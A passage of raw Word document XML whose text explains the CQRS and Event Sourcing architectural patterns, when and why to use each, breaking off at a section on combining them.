          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it a perfect fit for high-performance, scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC0BE6" w14:textId="4131996F" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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4A10B0B">
          <v:rect id="_x0000_i2869" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A4C9E" w14:textId="694B1022" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E25E70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="688" w:name="_Toc196308168"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CQRS and Event Sourcing: When and why to use them</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="688"/>
    </w:p>
    <w:p w14:paraId="5F1DF66C" w14:textId="6F087249" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are architectural patterns that can be extremely useful in specific use cases, particularly when dealing with complex domains, high scalability, or distributed systems. Here’s a detailed explanation of when and why to use them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B838067" w14:textId="77777777" w:rsidR="00312742"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17B6DB9">
          <v:rect id="_x0000_i2870" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1A9DD"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1. CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E50D6"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CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a pattern that separates </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (query) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (command) operations into different models, allowing them to be optimized independently. In a typical application, both read and write operations are handled by the same model (e.g., CRUD). CQRS suggests splitting these into separate models, one for handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (writes) and one for handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFFB82"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When to Use CQRS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695074EE"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Complex Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2ABF9" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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If your system has complex business logic that requires different handling for reads and writes, CQRS can help separate these concerns for easier maintenance and scalability. For example, writing and reading data might involve different structures, validation, and transformation rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC3D4F"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Scalability Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8CEF9" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">When your application needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale reads and writes independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, CQRS is useful. For example, if you have a system that reads data very frequently but writes less frequently, you can scale the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query side</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> independently to handle the heavy load of reads while keeping the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command side</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> more lightweight and focused on writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E9070A"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Performance Optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFE9A4" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Read-heavy applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as reporting or analytics) benefit from having a dedicated read model, which can be optimized for fast querying. The query model can use denormalized data, optimized indexes, and other techniques that are specific to read performance, without affecting write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A731EB4"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Eventual Consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DCF68" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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If your system can tolerate eventual consistency (i.e., when reads and writes may not always be immediately in sync), CQRS can allow for eventual consistency across the command and query models. This is particularly useful in distributed systems or microservices architectures, where maintaining strict consistency might be too costly or impractical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BAB7D3"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Audit and Traceability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AFAD6" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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If your system needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> all changes (e.g., for compliance or debugging), separating the write model allows you to track changes independently of the read operations. This can help trace when data was modified and by whom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E5ADC6"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Why Use CQRS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03484A18"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Improved Read/Write Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F20F0" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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By decoupling read and write operations, each model can be optimized independently, leading to better performance. For example, the read model can be optimized for fast queries with indexes, while the write model focuses on efficient data modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF3CBC"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Better Maintainability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB99C7B" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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By clearly separating concerns, the system becomes easier to maintain. You can modify how data is read or written without affecting the other side of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4DB00"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Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42816B" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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With CQRS, you can scale your system more efficiently. The read model can scale independently of the write model, ensuring that you can handle large volumes of data without degrading performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BA76E" w14:textId="77777777" w:rsidR="00312742"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72D0395">
          <v:rect id="_x0000_i2871" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="550324B1"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2. Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A36C58"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Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a pattern where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state of a system is persisted as a sequence of events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than storing just the current state. Every change to the state (such as updates or deletes) is stored as an event, and the current state can be reconstructed by replaying those events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C806833"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When to Use Event Sourcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A4CAA"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Complex State Transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CBCAF5" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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When the state of an entity or system undergoes complex transitions, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps capture these changes as a sequence of events. For example, if the system is involved in workflows with multiple steps or if each state change needs to be recorded for historical purposes (such as a bank account with deposits and withdrawals).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35F17F"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Event-Driven Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E5C79" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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If your system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or integrates with multiple systems that need to respond to state changes (e.g., triggering a downstream process when an event occurs), event sourcing can provide a clean way to represent and propagate state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE3E6F"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Auditing and History:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E162B" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Event sourcing is perfect for scenarios where you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>track every change</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the data over time. This is often required in systems that need an audit trail or have regulatory compliance requirements. For example, you could recreate any previous state by replaying the events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5548C"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Distributed Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50497266" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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When you're building </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or distributed systems, event sourcing can help manage and propagate changes in a distributed manner. Each service can listen to events that affect it, enabling better </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6907E"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Eventual Consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D1F8A7" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Event sourcing can be useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventually consistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems, where consistency between services or components is not immediate but is achieved over time as events are propagated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D186C"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Why Use Event Sourcing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDEEDE1"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History and Auditability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958BA50" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Since all changes are stored as events, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replay events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reconstruct the state of an entity at any point in time, allowing for full </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auditability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF06648"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lastRenderedPageBreak/>
        <w:t>Decoupling of Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10909C1F" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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In a microservices architecture, event sourcing can help decouple services. For instance, other services can listen to and act on events generated by a service without needing to query the service directly for its current state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1FB13"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Data Recovery and Replay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9C904" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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If a system needs to recover data or undo changes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to replay events to get back to any state in the past, which can be helpful in scenarios like system failures or debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A317260"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Event-Driven Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD9122" w14:textId="77777777" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742"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Event sourcing naturally fits with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling more decoupled and responsive systems where components react to events instead of querying for changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5B167" w14:textId="77777777" w:rsidR="00312742"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4EF5FDF">
          <v:rect id="_x0000_i2872" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24636D33"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Combining CQRS and Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560FA86"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CQRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
